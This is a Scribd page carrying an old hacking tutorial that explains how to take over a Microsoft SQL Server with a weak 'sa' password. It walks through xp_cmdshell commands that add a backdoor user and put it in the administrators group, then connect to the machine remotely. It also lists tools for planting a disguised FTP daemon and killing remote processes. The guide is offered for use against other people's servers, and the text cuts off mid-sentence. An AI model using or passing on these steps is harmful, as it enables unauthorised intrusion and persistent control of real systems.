Scribd
Upload
86 views

Hacking SQL, The Ntpass

This document describes how to hack into a SQL server to gain administrator access on the remote machine. It involves using tools like psexec and sqlexec to add a new user account and elevate its privileges to administrator on the target system by exploiting the xp_cmdshell stored procedure to execute commands like 'net user' and 'net localgroup'. The goal is to establish a way to remotely access and control the hacked server.

Uploaded by

Kell Valdyr Leryd
Copyright
© © All Rights Reserved
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
86 views

Hacking SQL, The Ntpass

This document describes how to hack into a SQL server to gain administrator access on the remote machine. It involves using tools like psexec and sqlexec to add a new user account and elevate its privileges to administrator on the target system by exploiting the xp_cmdshell stored procedure to execute commands like 'net user' and 'net localgroup'. The goal is to establish a way to remotely access and control the hacked server.

Uploaded by

Kell Valdyr Leryd
Copyright
© © All Rights Reserved
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 1

Hacking SQL, the NTPASS way

Needed filez Description..


Winmgnt.exe FTP server daemon
servudaemon.ini settings for ftp server
psexec (get it here)-http://www.sysinternals.com/files/psexec.zip program for ex
ecuting files remotely
serv-u Install this program local, to administer your hacked stros...
explorer.exe Should be in your wind0ze client
tlist.exe shows processlist on remote machine (with pID)
kill.exe kills processes on remote machine, in format "kill <pID>"
SQLExec Givin you the power to get admin
--------------------------------------------------------------------------------
on this one, you need a SQL scan...
You will ofcourse have a mssql server with a weak password, and some nice
stored procedures, like xp_cmdshell
IP 192.168.1.1
User sa
Pass
This SQL server got a nice feature. Remember the mssql server is always running
as administrator
on the computer. This gives you some nice possibilites, unlike IIS.
Do you know the very userfriendly (read: hackerfriendly) net.exe? We're going to
use it
I suppose you're just a little familiar with SQLexec, else read my SQLhacking gu
ide...
1) Go to the commandline input textbox in sqlexec.
type "net user [username] [password] /ADD"
like this:
net user pizzaking ev1lp4ss /ADD
the account should now be available as a guest.
Since being a guest isnt much fun, you better do this too:
"net localgroup [name of administratorusergroup] [username] /ADD" like this:
net localgroup administrators pizzaking /ADD
2) Start -> Run "\\192.168.1.1"
Now the server should ask you for a username and a matching password. Enter the
information you've got from the scan (in this example you just enter "pizzaking"
as username and "ev1lp4ss" as the password...
And now: Go read the ntpass hacking guide (its really kinda the same stuff

You might also like